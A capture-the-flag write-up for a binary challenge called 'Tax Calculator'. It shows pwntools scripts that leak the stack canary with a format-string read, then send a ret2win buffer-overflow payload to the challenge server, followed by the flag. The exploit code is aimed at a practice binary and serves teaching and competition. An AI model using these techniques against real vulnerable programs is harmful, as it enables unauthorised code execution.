Tax Calculator

hi i am bob, a middle aged unkle trying to calculate my taxes but i learned this language c from my father and i builded this cool application to help with paying my taxes

Format string + Canary bypass ret2win challenge

Firstly I went to disassemble this in IDA.

From this screenshot, I found that there is a flag function, so I went to find the address of it.

After this i went to find the ret address

Thus we have found the flag address (0x000000000040154b) and the ret address (0x0000000000401016), however what about the offset?

I decided to write a script to check for the canary by bruteforcing it.

from pwn import *
binary = './tax_calculator'
# Loop through possible offsets
for offset in range(1, 50):
    try:
        p = process(binary)
        # Generate format string to test the current offset
        fmt_str = f"%{offset}$p"
        print(f"Testing offset: {offset} with format string: {fmt_str}")
        p.sendlineafter("Enter your annual income: ", fmt_str)

        output = p.recvline().decode().strip()
        print(f"Output for offset {offset}: {output}")

        if len(output) > 2 and output[-2:] == "00":
            print(f"Possible stack value ending with 00 found at offset {offset}: {output}")
            break
        
        p.close()
    except EOFError:
        continue

After running this script, we see

Testing offset: 17 with format string: %17$p
Output for offset 17: You entered: 0x346fc5dfecc23400
Possible stack value ending with 00 found at offset 17: You entered: 0x346fc5dfecc23400
[*] Stopped process './tax_calculator' (pid 62)

Thus we have found the offset

After referring to a few writeups like the following

Killer Queen CTF : Tweety Birb (Canary bypass with format string vulnerability)Medium

I came up with my solve script

from pwn import *

#overwrite is 77 
overwrite = b'A' * 77
win = p64(0x000000000040154b)
ret = p64(0x0000000000401016)

p = remote('chal1.gryphons.sg', 10000)

p.recvuntil(b"Enter your annual income: ")
p.sendline(b"%17$p") #Calculate Offset as canaries always end in 00
response = p.recvline().strip()
log.info(f"Leaked Response: {response}")

try:
    canary_str = response.split(b'0x')[1]
    canary = int(b'0x' + canary_str, 16)
    log.info(f"Parsed Canary: {hex(canary)}")
except (IndexError, ValueError):
    log.error("Failed to parse the canary. Exiting.")
    exit(1)

payload = overwrite
payload += p64(canary)
payload += b'B' * 8
payload += ret
payload += win

p.recvuntil(b"Enter your filing choice:\n")
p.recvuntil(b"> ")
p.sendline(payload)

p.interactive()

Output

Thus the flag is GCTF24{74x_3v4510n_my_b3l0v3d}